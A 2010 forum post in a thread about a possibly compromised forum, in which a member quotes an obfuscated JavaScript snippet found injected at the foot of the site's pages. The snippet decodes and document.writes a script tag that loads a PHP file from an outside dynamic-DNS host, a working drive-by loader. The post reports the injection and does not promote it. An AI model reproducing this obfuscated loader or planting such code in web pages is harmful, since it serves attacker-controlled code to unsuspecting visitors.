Thread: Forum compromised?
View Single Post
Old 23-02-2010, 01:06:30 PM     #16 (permalink)
davedevelopment

 
davedevelopment's Avatar
 
Join Date: May 2009
Location: Brough, East Yorks
Posts: 993
davedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond repute
Quote:
Originally Posted by Edwin View Post
Most likely the site's been hacked with some kind of code injection exploit. The version of vbulletin that's running is pretty old after all, if the version number at the foot of the page is correct.
Yeah, this looks dodgy to me, just above some Google Analytics code at the foot of the page.

UPDATE: My bad, didn't see Rob's post.

Code:
<script
var AjPdIJYXLs = "VYojT23VYojT33"; var aPzJSlR0bO0 = "VYojT3cVYojT73VYojT63VYojT72VYo"; var aPzJSlR0bO1 = "jT69VYojT70VYojT74VYojT20VYojT7"; var aPzJSlR0bO2 = "3VYojT72VYojT63VYojT3dVYojT22VY"; var aPzJSlR0bO3 = "ojT68VYojT74VYojT74VYojT70VYojT"; var aPzJSlR0bO4 = "3aVYojT2fVYojT2fVYojT6dVYojT6dV"; var aPzJSlR0bO5 = "YojT66VYojT61VYojT76VYojT2eVYoj"; var aPzJSlR0bO6 = "T73VYojT65VYojT72VYojT76VYojT65"; var aPzJSlR0bO7 = "VYojT68VYojT74VYojT74VYojT70VYo"; var aPzJSlR0bO8 = "jT2eVYojT63VYojT6fVYojT6dVYojT2"; var aPzJSlR0bO9 = "fVYojT2fVYojT6dVYojT6cVYojT2eVY"; var aPzJSlR0bO10 = "ojT70VYojT68VYojT70VYojT22VYojT"; var aPzJSlR0bO11 = "3eVYojT20VYojT3cVYojT2fVYojT73V"; var aPzJSlR0bO12 = "YojT63VYojT72VYojT69VYojT70VYoj"; var aPzJSlR0bO13 = "T74VYojT3e"; var pppxhNzbrz = "TviGq23VYojT33"; var gdplog8PER = aPzJSlR0bO0 + aPzJSlR0bO1 + aPzJSlR0bO2 + aPzJSlR0bO3 + aPzJSlR0bO4 + aPzJSlR0bO5 + aPzJSlR0bO6 + aPzJSlR0bO7 + aPzJSlR0bO8 + aPzJSlR0bO9 + aPzJSlR0bO10 + aPzJSlR0bO11 + aPzJSlR0bO12 + aPzJSlR0bO13; var zy7a7KGjPG = "FOmyW23NBx0Y33"; FUPa52wyIc = gdplog8PER.replace(/VYojT/g,"%"); var la27tUrKdS=unescape;var AjPdIJYXLs = "NBx0Y23TviGq33"; q9124=this; var Y07YuuE3KT= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Y07YuuE3KT.write(la27tUrKdS(FUPa52wyIc)); </script>
__________________
Me: Blog | Company | Twitter

Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk
Last edited by davedevelopment; 23-02-2010 at 01:07:19 PM. Reason: Didn't see Robs post
davedevelopment is offline